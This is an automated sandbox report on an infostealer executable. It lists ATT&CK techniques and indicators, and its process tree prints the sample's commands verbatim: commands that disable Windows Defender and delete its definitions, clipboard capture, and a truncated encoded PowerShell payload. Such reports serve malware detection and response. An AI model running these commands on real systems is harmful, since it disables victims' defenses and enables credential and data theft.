50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fc

Analysis

max time kernel
93s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19/09/2024, 03:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
Size

7.1MB
MD5

7053939403954077da65aa1ebc0adb50
SHA1

0541ab4508f16f3e6a3fc091337633fc302e8ff8
SHA256

50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fc
SHA512

05dac9246d00678e7ba575e9434472a0acd4ffcbe594c210a137245c7b32230faf4715e225020e056a7ef8160df9b03ad049f4b01c1eed2c2cc058d9794af08a
SSDEEP

98304:b6cSI+O2OI0zrnZrIogzhol9z01ivPNooA52QhF4hWEw11iYRIbriMW4kS1SRIab:n+O2OIkZZQhfUvug/CSr5WIT98

Score

9^/10

collection credential_access defense_evasion discovery execution spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2012	powershell.exe
1728	powershell.exe
3972	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4608	cmd.exe
2548	powershell.exe

Loads dropped DLL 34 IoCs

pid	Process
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	discord.com
21	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1480	tasklist.exe
3300	tasklist.exe
2156	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getmac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1404	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3064	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
2012	powershell.exe
2012	powershell.exe
1728	powershell.exe
1728	powershell.exe
1436	powershell.exe
1436	powershell.exe
2548	powershell.exe
2548	powershell.exe
2012	powershell.exe
1728	powershell.exe
1436	powershell.exe
2548	powershell.exe
3972	powershell.exe
3972	powershell.exe
1520	powershell.exe
1520	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	1480	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2408	WMIC.exe
Token: SeSecurityPrivilege	2408	WMIC.exe
Token: SeTakeOwnershipPrivilege	2408	WMIC.exe
Token: SeLoadDriverPrivilege	2408	WMIC.exe
Token: SeSystemProfilePrivilege	2408	WMIC.exe
Token: SeSystemtimePrivilege	2408	WMIC.exe
Token: SeProfSingleProcessPrivilege	2408	WMIC.exe
Token: SeIncBasePriorityPrivilege	2408	WMIC.exe
Token: SeCreatePagefilePrivilege	2408	WMIC.exe
Token: SeBackupPrivilege	2408	WMIC.exe
Token: SeRestorePrivilege	2408	WMIC.exe
Token: SeShutdownPrivilege	2408	WMIC.exe
Token: SeDebugPrivilege	2408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2408	WMIC.exe
Token: SeRemoteShutdownPrivilege	2408	WMIC.exe
Token: SeUndockPrivilege	2408	WMIC.exe
Token: SeManageVolumePrivilege	2408	WMIC.exe
Token: 33	2408	WMIC.exe
Token: 34	2408	WMIC.exe
Token: 35	2408	WMIC.exe
Token: 36	2408	WMIC.exe
Token: SeDebugPrivilege	3300	tasklist.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	2156	tasklist.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeIncreaseQuotaPrivilege	2408	WMIC.exe
Token: SeSecurityPrivilege	2408	WMIC.exe
Token: SeTakeOwnershipPrivilege	2408	WMIC.exe
Token: SeLoadDriverPrivilege	2408	WMIC.exe
Token: SeSystemProfilePrivilege	2408	WMIC.exe
Token: SeSystemtimePrivilege	2408	WMIC.exe
Token: SeProfSingleProcessPrivilege	2408	WMIC.exe
Token: SeIncBasePriorityPrivilege	2408	WMIC.exe
Token: SeCreatePagefilePrivilege	2408	WMIC.exe
Token: SeBackupPrivilege	2408	WMIC.exe
Token: SeRestorePrivilege	2408	WMIC.exe
Token: SeShutdownPrivilege	2408	WMIC.exe
Token: SeDebugPrivilege	2408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2408	WMIC.exe
Token: SeRemoteShutdownPrivilege	2408	WMIC.exe
Token: SeUndockPrivilege	2408	WMIC.exe
Token: SeManageVolumePrivilege	2408	WMIC.exe
Token: 33	2408	WMIC.exe
Token: 34	2408	WMIC.exe
Token: 35	2408	WMIC.exe
Token: 36	2408	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2204	WMIC.exe
Token: SeSecurityPrivilege	2204	WMIC.exe
Token: SeTakeOwnershipPrivilege	2204	WMIC.exe
Token: SeLoadDriverPrivilege	2204	WMIC.exe
Token: SeSystemProfilePrivilege	2204	WMIC.exe
Token: SeSystemtimePrivilege	2204	WMIC.exe
Token: SeProfSingleProcessPrivilege	2204	WMIC.exe
Token: SeIncBasePriorityPrivilege	2204	WMIC.exe
Token: SeCreatePagefilePrivilege	2204	WMIC.exe
Token: SeBackupPrivilege	2204	WMIC.exe
Token: SeRestorePrivilege	2204	WMIC.exe
Token: SeShutdownPrivilege	2204	WMIC.exe
Token: SeDebugPrivilege	2204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2204	WMIC.exe
Token: SeRemoteShutdownPrivilege	2204	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1140 wrote to memory of 880	1140	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	82
PID 1140 wrote to memory of 880	1140	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	82
PID 1140 wrote to memory of 880	1140	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	82
PID 880 wrote to memory of 3920	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	83
PID 880 wrote to memory of 3920	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	83
PID 880 wrote to memory of 3920	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	83
PID 880 wrote to memory of 2352	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	84
PID 880 wrote to memory of 2352	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	84
PID 880 wrote to memory of 2352	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	84
PID 3920 wrote to memory of 2012	3920	cmd.exe	88
PID 3920 wrote to memory of 2012	3920	cmd.exe	88
PID 3920 wrote to memory of 2012	3920	cmd.exe	88
PID 2352 wrote to memory of 1728	2352	cmd.exe	87
PID 2352 wrote to memory of 1728	2352	cmd.exe	87
PID 2352 wrote to memory of 1728	2352	cmd.exe	87
PID 880 wrote to memory of 3312	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	89
PID 880 wrote to memory of 3312	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	89
PID 880 wrote to memory of 3312	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	89
PID 880 wrote to memory of 2160	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	90
PID 880 wrote to memory of 2160	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	90
PID 880 wrote to memory of 2160	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	90
PID 880 wrote to memory of 3968	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	93
PID 880 wrote to memory of 3968	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	93
PID 880 wrote to memory of 3968	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	93
PID 880 wrote to memory of 4608	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	94
PID 880 wrote to memory of 4608	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	94
PID 880 wrote to memory of 4608	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	94
PID 880 wrote to memory of 4480	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	96
PID 880 wrote to memory of 4480	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	96
PID 880 wrote to memory of 4480	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	96
PID 880 wrote to memory of 3596	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	98
PID 880 wrote to memory of 3596	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	98
PID 880 wrote to memory of 3596	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	98
PID 880 wrote to memory of 5088	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	101
PID 880 wrote to memory of 5088	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	101
PID 880 wrote to memory of 5088	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	101
PID 880 wrote to memory of 3056	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	103
PID 880 wrote to memory of 3056	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	103
PID 880 wrote to memory of 3056	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	103
PID 3312 wrote to memory of 1480	3312	cmd.exe	105
PID 3312 wrote to memory of 1480	3312	cmd.exe	105
PID 3312 wrote to memory of 1480	3312	cmd.exe	105
PID 2160 wrote to memory of 3300	2160	cmd.exe	106
PID 2160 wrote to memory of 3300	2160	cmd.exe	106
PID 2160 wrote to memory of 3300	2160	cmd.exe	106
PID 4608 wrote to memory of 2548	4608	cmd.exe	108
PID 4608 wrote to memory of 2548	4608	cmd.exe	108
PID 4608 wrote to memory of 2548	4608	cmd.exe	108
PID 5088 wrote to memory of 3064	5088	cmd.exe	107
PID 5088 wrote to memory of 3064	5088	cmd.exe	107
PID 5088 wrote to memory of 3064	5088	cmd.exe	107
PID 3968 wrote to memory of 2408	3968	cmd.exe	109
PID 3968 wrote to memory of 2408	3968	cmd.exe	109
PID 3968 wrote to memory of 2408	3968	cmd.exe	109
PID 3596 wrote to memory of 548	3596	cmd.exe	124
PID 3596 wrote to memory of 548	3596	cmd.exe	124
PID 3596 wrote to memory of 548	3596	cmd.exe	124
PID 4480 wrote to memory of 2156	4480	cmd.exe	111
PID 4480 wrote to memory of 2156	4480	cmd.exe	111
PID 4480 wrote to memory of 2156	4480	cmd.exe	111
PID 3056 wrote to memory of 1436	3056	cmd.exe	112
PID 3056 wrote to memory of 1436	3056	cmd.exe	112
PID 3056 wrote to memory of 1436	3056	cmd.exe	112
PID 880 wrote to memory of 3808	880	50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe	114

C:\Users\Admin\AppData\Local\Temp\50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
"C:\Users\Admin\AppData\Local\Temp\50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1140
- C:\Users\Admin\AppData\Local\Temp\50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe
  "C:\Users\Admin\AppData\Local\Temp\50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3920
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\50ba43dced201f11d4d4b63a9cd974f1dc8e8b1d74664fa6002167eaf0ca05fcN.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2352
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3312
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2160
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3968
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4608
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4480
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3596
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5088
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:3064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5A